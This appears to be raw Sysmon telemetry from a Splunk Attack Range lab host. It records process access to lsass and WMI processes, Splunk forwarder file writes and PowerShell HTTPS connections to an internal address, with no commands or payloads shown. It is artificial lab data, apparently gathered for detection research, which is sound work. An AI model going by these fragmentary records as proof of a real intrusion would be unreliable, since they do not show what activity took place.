18:15:44.273{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085438Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:44.273{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085437Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.273{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085436Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:44.273{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4F50-613A-6490-03000000C801}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085435Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.273{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F50-613A-6490-03000000C801}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085434Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.258{B81B27B7-4F50-613A-6490-03000000C801}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085455Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:45.940{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=29390A4474E6FCBD66257930D9E0FD8B,SHA256=227E2D41CB2E2D47054E09F7A59BF3C58000E87CA3666A4C344C361E54052EA0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085454Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:45.919{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94D282AB831A05AC72C55DD6FF24FC58,SHA256=8F6A583BD58758AE222CA83C8991134D3FCE50DC6C39D7A79DBAAE25BA7A033D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085457Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:46.971{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6C1AE2B8712A310C1641843C3170518,SHA256=4962E844AF67569403F8CF12DE446A1F61559E17838B9FA835451AC23FA51CBD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085456Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:11.112{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56732-false10.0.1.12-8000- 23542300x800000000000000035085458Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:47.986{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEF43E7C707E1944717209E6AFED2F3C,SHA256=B40075F25A7D612C219B6860F252E1D5B63B2B6DB7B5B2F16BA7D1D0A2CEA40F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085461Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:14.341{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56733-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085460Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:49.500{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0DFDD2C3CFCBCE6CAC73FF63B3E44013,SHA256=72F3757BDDCF0605AC12A5B1BA17D8D1F8E56B7B414FFE9DDD188FAF70AD1EE3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085459Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:49.034{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2464AAA051FD563359AE030842FD8D3F,SHA256=EFD1428770CB410E884FEF9E4FF21A90E2ADCD1B4843ADB621CED6AFA385CA81,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085462Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:50.053{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97A4F65CBEB097934A4054F2D61F226B,SHA256=321E929CC4796696AC98366EC00F0CFDFB920462B23EDB808DBAA3BCF3DE760F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085464Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:16.155{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56734-false10.0.1.12-8000- 23542300x800000000000000035085463Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:51.067{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E1A4274067D4EF39DF34B9802D313F5,SHA256=ED81AF512B5F8274890920689CECC2637B6A608C0322CCF250838EDD16EA39EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085465Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:52.082{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51B76E86EE87E503C5AF4B072A54D174,SHA256=3B44664A90B761516B50AF98209CC962148C934754778AE71290A74413B68BCB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085466Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:53.112{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=369EB5CAE354B2172AFBD4E09AFA7C1C,SHA256=4B2D3C91AF22C3149F378479759C66B8E93BBCCD32BD927FF7EF9466084DD1D0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085470Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:54.950{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000035085469Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:19.353{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56735-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085468Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:54.412{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=44A9C77F9C6CC21726FD6F85489AB187,SHA256=1B56F8EF279B88131EA9A6C680F2658A7EC2962F2CEAF2AEA4C9E8E8881477B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085467Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:54.130{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84098B62C49DE8F2B5E79E5EF07DFA44,SHA256=23D012D91FD9DEAE66909B4EE4AA2F337428278F34D5898AD0E846411E17A344,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085471Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:55.150{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E64FFC1C9C014F116A68B698471B66EE,SHA256=53EFEC43CE4D84BFAFF9508844F2C1A4679A4595189BD770363A2C8B2E48A917,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 354300x800000000000000035085497Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:21.205{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56737-false10.0.1.12-8000- 354300x800000000000000035085496Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:20.952{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56736-false10.0.1.12-8089- 23542300x800000000000000035085495Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.864{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\aborted-session-pingMD5=2434FD8154FD1E49932CCEC2D1C28A98,SHA256=9D5E1CDEE0586B5EC80C13590577C1A4E0C2D2C6875B97A3723E791F4FD79D73,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085494Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.196{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB0694582EFC541867CBEE70CB4A8359,SHA256=9656A92A8C0D02A6C0E85A86892EA86E2D1B0D170A5C1C94C55BFDAAE1088BEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085493Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:56.111{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085492Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.111{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085491Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:56.111{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085490Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.096{B81B27B7-4013-611D-1600-00000000C801}11966680C:\Windows\system32\svchost.exe{B81B27B7-4F5C-613A-6690-03000000C801}908C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+3ef6a|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL3
2.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085489Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.080{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F5C-613A-6690-03000000C801}908C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085488Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.065{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4F5C-613A-6690-03000000C801}908C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085487Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:56.065{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F5C-613A-6690-03000000C801}908C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085486Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.049{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035085485Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.049{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085484Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 